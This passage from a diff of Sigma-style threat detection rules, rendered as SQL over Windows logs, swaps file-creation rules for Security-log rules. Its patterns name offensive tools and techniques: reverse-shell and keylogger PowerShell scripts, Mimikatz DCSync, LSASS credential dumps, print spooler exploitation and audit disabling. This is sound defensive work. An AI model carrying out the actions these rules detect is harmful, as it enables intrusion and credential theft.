ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" ], - "filename": "file_event_win_powershell_exploit_scripts.yml" + "filename": "win_security_susp_dsrm_password_change.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile - File", - "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", - "status": "experimental", - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Denied Access To Remote Desktop", + "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", + "status": "test", + "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", + "author": "Pushkarev Dmitry", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Valid user was not added to RDP group" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4825')" ], - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" + "filename": "win_security_not_allowed_rdp_access.yml" }, { - "title": "Potential Winnti Dropper Activity", - "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "title": "First Time Seen Remote Named Pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", "status": "test", - "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" + "attack.lateral_movement", + "attack.t1021.002" ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml" - }, - { - "title": "WScript or CScript Dropper - File", - "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", - "status": "experimental", - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "author": "Tim Shelton", "falsepositives": [ - "Unknown" + "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" ], - "filename": "file_event_win_cscript_wscript_dropper.yml" + "filename": "win_security_lm_namedpipe.yml" }, { - "title": "Potential Persistence Via Notepad++ Plugins", - "id": "54127bd4-f541-4ac3-afdb-ea073f63f692", - "status": "experimental", - "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious LDAP-Attributes Used", + "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "status": "test", + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "author": "xknow @xknow_infosec", "tags": [ - "attack.persistence" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Possible FPs during first installation of Notepad++", - "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" + "Companies, who may use these default LDAP-Attributes for personal information" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\target.exe' ESCAPE '\\' OR Image LIKE '%Installer.x64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" ], - "filename": "file_event_win_notepad_plus_plus_persistence.yml" + "filename": "win_security_susp_ldap_dataexchange.yml" }, { - "title": "PSEXEC Remote Execution File Artefact", - "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", - "status": "experimental", - "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Hacktool Ruler", + "id": "24549159-ac1b-479c-8175-d42aea947cae", + "status": "test", + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", + "attack.discovery", "attack.execution", - "attack.persistence", - "attack.t1136.002", - "attack.t1543.003", - "attack.t1570", - "attack.s0029" + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" ], "falsepositives": [ - "Unlikely" + "Go utilities that use staaldraad awesome NTLM library" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" ], - "filename": "file_event_win_psexec_service_key.yml" + "filename": "win_security_alert_ruler.yml" }, { - "title": "Suspicious VHD Image Download From Browser", - "id": "8468111a-ef07-4654-903b-b863a80bbc95", - "status": "test", - "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "id": "8fe1c584-ee61-444b-be21-e9054b229694", + "status": "experimental", + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "author": "INIT_6", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Legitimate user creation" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" ], - "filename": "file_event_win_mal_vhd_download.yml" + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" }, { - "title": "PCRE.NET Package Temp Files", - "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", "status": "test", - "description": "Detects processes creating temp files related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "author": "@neu5ron", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" ], - "filename": "file_event_win_pcre_net_temp_file.yml" + "filename": "win_security_disable_event_logging.yml" }, { - "title": "Moriya Rootkit", - "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "status": "test", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" ], - "filename": "file_event_win_moriya_rootkit.yml" + "filename": "win_security_susp_rottenpotato.yml" }, { - "title": "Drop Binaries Into Spool Drivers Color Folder", - "id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "status": "experimental", - "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Mimikatz DC sync security events", + "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_spool_drivers_color_drop.yml" + "filename": "win_security_dcsync.yml" }, { - "title": "Publisher Attachment File Dropped In Suspicious Location", - "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", - "status": "experimental", - "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Sessions Network Connections (WinRM)", + "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "status": "test", + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of \".pub\" files from those locations" + "Legitimate use of remote PowerShell execution" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" ], - "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" + "filename": "win_security_remote_powershell_session.yml" }, { - "title": "ScreenConnect Temporary Installation Artefact", - "id": "fec96f39-988b-4586-b746-b93d59fd1922", + "title": "Defrag Deactivation - Security", + "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1053", + "attack.s0111" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4701' AND TaskName LIKE '\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" ], - "filename": "file_event_win_screenconnect_artefact.yml" + "filename": "win_security_apt_slingshot.yml" }, { - "title": "LSASS Process Memory Dump Files", - "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "title": "Invoke-Obfuscation STDIN+ Launcher - Security", + "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "status": "experimental", - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_dump.yml" + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" }, { - "title": "Potential Initial Access via DLL Search Order Hijacking", - "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "title": "Suspicious Teams Application Related ObjectAcess Event", + "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "status": "experimental", - "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", - 